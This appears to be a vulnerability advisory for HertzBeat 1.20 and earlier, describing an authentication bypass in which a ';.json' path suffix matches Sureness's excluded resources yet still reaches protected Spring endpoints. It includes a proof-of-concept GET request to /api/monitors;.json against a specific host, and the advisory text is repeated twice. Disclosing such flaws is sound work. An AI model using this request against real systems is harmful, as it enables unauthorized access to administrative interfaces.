Impact
hertzbeat <= 1.20 has a permission bypass vulnerability
Permission bypass is a Web security vulnerability. It can bypass system authentication and invoke interfaces without authorization. As a result, the site is in an insecure state, such as directly invoking interfaces used by administrators.
Patches
You are advised to upgrade to the latest version.
Workarounds
You are advised to upgrade to the latest version.
References
https://github.com/dromara/hertzbeat
For more information
sureness filters excludeResource first. If a match is successful, Sureness allows excluderesource directly. If not, Sureness enters the subsequent authentication process. Here because of the use of; A request url such as.json causes the exclude block to be matched, allowing the request to be released. This request is also released due to the springbolt interface feature /aaa; .json
will go to /aaa
.
GET /api/monitors;.json?app=linux&pageIndex=0&pageSize=8 HTTP/1.1
Host: 1.15.182.88:1157
Accept: application/json, text/plain, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Referer: http://1.15.182.88:1157/monitors?app=linux
Accept-Encoding: gzip, deflate
Connection: close
Normal access request:
Normal access request without Authorization:
Impact
hertzbeat <= 1.20 has a permission bypass vulnerability
Permission bypass is a Web security vulnerability. It can bypass system authentication and invoke interfaces without authorization. As a result, the site is in an insecure state, such as directly invoking interfaces used by administrators.
Patches
You are advised to upgrade to the latest version.
Workarounds
You are advised to upgrade to the latest version.
References
https://github.com/dromara/hertzbeat
For more information
sureness filters excludeResource first. If a match is successful, Sureness allows excluderesource directly. If not, Sureness enters the subsequent authentication process. Here because of the use of; A request url such as.json causes the exclude block to be matched, allowing the request to be released. This request is also released due to the springbolt interface feature
/aaa; .json
will go to/aaa
.Normal access request:
Normal access request without Authorization: